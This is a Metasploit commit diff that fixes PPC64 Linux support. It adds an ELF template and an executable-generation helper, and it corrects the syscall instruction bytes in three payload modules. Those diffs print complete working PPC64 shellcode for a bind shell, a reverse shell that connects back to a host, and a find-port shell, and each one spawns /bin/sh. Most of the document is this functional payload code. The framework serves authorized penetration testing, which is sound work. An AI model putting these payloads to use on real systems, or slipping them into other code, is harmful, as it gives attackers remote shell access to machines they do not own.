Skip to content

Commit fda250d

Browse files
dledda-r7dledda-r7
authored
Merge pull request rapid7#19910 from msutovsky-r7/fix/add-PPC64-template
Fixing PPC64 template and payloads
2 parents fde78bf + 2122a34 commit fda250d

File tree

6 files changed

+111
-62
lines changed

6 files changed

+111
-62
lines changed

data/templates/src/elf/exe/elf_ppc64_template.s

Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
BITS 64
2+
ehdr: ; Elf32_Ehdr
3+
db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
4+
db 0, 0, 0, 0, 0, 0, 0, 0 ;
5+
dw 0x0200 ; e_type = ET_EXEC for an executable
6+
dw 0x1500 ; e_machine = PPC64
7+
dd 0x01000000 ; e_version
8+
dq 0x7810000000000000 ; e_entry
9+
dq 0x4000000000000000 ; e_phoff
10+
dq 0 ; e_shoff
11+
dd 0 ; e_flags
12+
dw 0x4000 ; e_ehsize
13+
dw 0x3800 ; e_phentsize
14+
dw 0x0100 ; e_phnum
15+
dw 0 ; e_shentsize
16+
dw 0 ; e_shnum
17+
dw 0 ; e_shstrndx
18+
19+
ehdrsize equ $ - ehdr
20+
21+
phdr: ; Elf32_Phdr
22+
23+
dd 0x01000000 ; p_type = pt_load
24+
dd 0x07000000 ; p_flags = rwx
25+
dq 0 ; p_offset
26+
dq 0x0010000000000000 ; p_vaddr
27+
dq 0x0010000000000000 ; p_paddr
28+
dq 0xefbeadde ; p_filesz
29+
dq 0xefbeadde ; p_memsz
30+
dq 0x0000100000000000 ; p_align
31+
32+
phdrsize equ $ - phdr
33+
34+
_start:
35+
dq 0x8010000000000000

data/templates/template_ppc64_linux.bin

128 Bytes
Binary file not shown.

lib/msf/util/exe.rb

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1232,6 +1232,16 @@ def self.to_linux_aarch64_elf(framework, code, opts = {})
12321232
to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
12331233
end
12341234

1235+
# self.to_linux_ppc64_elf
1236+
#
1237+
# @param framework [Msf::Framework]
1238+
# @param code [String]
1239+
# @param opts [Hash]
1240+
# @option [String] :template
1241+
# @return [String] Returns an elf
1242+
def self.to_linux_ppc64_elf(framework, code, opts = {})
1243+
to_exe_elf(framework, opts, "template_ppc64_linux.bin", code, true)
1244+
end
12351245
# self.to_linux_mipsle_elf
12361246
# Little Endian
12371247
# @param framework [Msf::Framework]
@@ -2178,6 +2188,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
21782188
to_linux_x64_elf(framework, code, exeopts)
21792189
when ARCH_AARCH64
21802190
to_linux_aarch64_elf(framework, code, exeopts)
2191+
when ARCH_PPC64
2192+
to_linux_ppc64_elf(framework, code, exeopts)
21812193
when ARCH_ARMLE
21822194
to_linux_armle_elf(framework, code, exeopts)
21832195
when ARCH_MIPSBE

modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb

Lines changed: 56 additions & 55 deletions
Original file line numberDiff line numberDiff line change
@@ -28,61 +28,62 @@ def initialize(info = {})
2828
'LPORT' => [ 58, 'n' ]
2929
},
3030
'Payload' =>
31-
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
32-
"\x3b\xa0\x01\xff" + # li r29,511 #
33-
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
34-
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
35-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
36-
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
37-
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
38-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
39-
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
40-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
41-
"\x44\xff\xff\x02" + # sc #
42-
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
43-
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
44-
"\x3e\xe0\xff\x02" + # lis r23,-254 #
45-
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
46-
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
47-
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
48-
"\x7c\x36\x0b\x78" + # mr r22,r1 #
49-
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
50-
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
51-
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
52-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
53-
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
54-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
55-
"\x44\xff\xff\x02" + # sc #
56-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
57-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
58-
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
59-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
60-
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
61-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
62-
"\x44\xff\xff\x02" + # sc #
63-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
64-
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
65-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
66-
"\x44\xff\xff\x02" + # sc #
67-
"\x7c\x75\x1b\x78" + # mr r21,r3 #
68-
"\x7f\x64\xdb\x78" + # mr r4,r27 #
69-
"\x7e\xa3\xab\x78" + # mr r3,r21 #
70-
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
71-
"\x44\xff\xff\x02" + # sc #
72-
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
73-
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
74-
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
75-
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
76-
"\x7f\xc8\x02\xa6" + # mflr r30 #
77-
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
78-
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
79-
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
80-
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
81-
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
82-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
83-
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
84-
"\x44\xff\xff\x02" + # sc #
85-
'/bin/sh'
31+
32+
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
33+
"\x3b\xa0\x01\xff" + # li r29,511 #
34+
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
35+
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
36+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
37+
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
38+
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
39+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
40+
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
41+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
42+
"\x44\x00\x00\x02" + # sc #
43+
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
44+
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
45+
"\x3e\xe0\xff\x02" + # lis r23,-254 #
46+
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
47+
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
48+
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
49+
"\x7c\x36\x0b\x78" + # mr r22,r1 #
50+
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
51+
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
52+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
53+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
54+
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
55+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
56+
"\x44\x00\x00\x02" + # sc #
57+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
58+
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
59+
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
60+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
61+
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
62+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
63+
"\x44\x00\x00\x02" + # sc #
64+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
65+
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
66+
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
67+
"\x44\x00\x00\x02" + # sc #
68+
"\x7c\x75\x1b\x78" + # mr r21,r3 #
69+
"\x7f\x64\xdb\x78" + # mr r4,r27 #
70+
"\x7e\xa3\xab\x78" + # mr r3,r21 #
71+
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
72+
"\x44\x00\x00\x02" + # sc #
73+
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
74+
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
75+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
76+
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
77+
"\x7f\xc8\x02\xa6" + # mflr r30 #
78+
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
79+
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
80+
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
81+
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
82+
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
83+
"\x7c\x24\x0b\x78" + # mr r4,r1 #
84+
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
85+
"\x44\x00\x00\x02" + # sc #
86+
"/bin/sh"
8687
}
8788
)
8889
)

modules/payloads/singles/linux/ppc64/shell_find_port.rb

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -28,6 +28,7 @@ def initialize(info = {})
2828
'CPORT' => [ 86, 'n' ]
2929
},
3030
'Payload' =>
31+
3132
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
3233
"\x3b\xa0\x01\xff" + # li r29,511 #
3334
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
@@ -46,7 +47,7 @@ def initialize(info = {})
4647
"\x7c\x24\x0b\x78" + # mr r4,r1 #
4748
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
4849
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
49-
"\x44\xff\xff\x02" + # sc #
50+
"\x44\x00\x00\x02" + # sc #
5051
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
5152
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
5253
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
@@ -55,7 +56,7 @@ def initialize(info = {})
5556
"\x7f\x04\xc3\x78" + # mr r4,r24 #
5657
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
5758
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
58-
"\x44\xff\xff\x02" + # sc #
59+
"\x44\x00\x00\x02" + # sc #
5960
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
6061
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
6162
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
@@ -68,7 +69,7 @@ def initialize(info = {})
6869
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
6970
"\x7c\x24\x0b\x78" + # mr r4,r1 #
7071
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
71-
"\x44\xff\xff\x02" + # sc #
72+
"\x44\x00\x00\x02" + # sc #
7273
'/bin/sh'
7374
}
7475
)

modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -39,7 +39,7 @@ def initialize(info = {})
3939
"\x7c\x24\x0b\x78" + # mr r4,r1 #
4040
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
4141
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
42-
"\x44\xff\xff\x02" + # sc #
42+
"\x44\x00\x00\x02" + # sc #
4343
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
4444
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
4545
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
@@ -55,11 +55,11 @@ def initialize(info = {})
5555
"\x7c\x24\x0b\x78" + # mr r4,r1 #
5656
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
5757
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
58-
"\x44\xff\xff\x02" + # sc #
58+
"\x44\x00\x00\x02" + # sc #
5959
"\x7f\x64\xdb\x78" + # mr r4,r27 #
6060
"\x7f\x43\xd3\x78" + # mr r3,r26 #
6161
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
62-
"\x44\xff\xff\x02" + # sc #
62+
"\x44\x00\x00\x02" + # sc #
6363
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
6464
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
6565
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
@@ -72,7 +72,7 @@ def initialize(info = {})
7272
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
7373
"\x7c\x24\x0b\x78" + # mr r4,r1 #
7474
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
75-
"\x44\xff\xff\x02" + # sc #
75+
"\x44\x00\x00\x02" + # sc #
7676
'/bin/sh'
7777
}
7878
)

0 commit comments

Comments
 (0)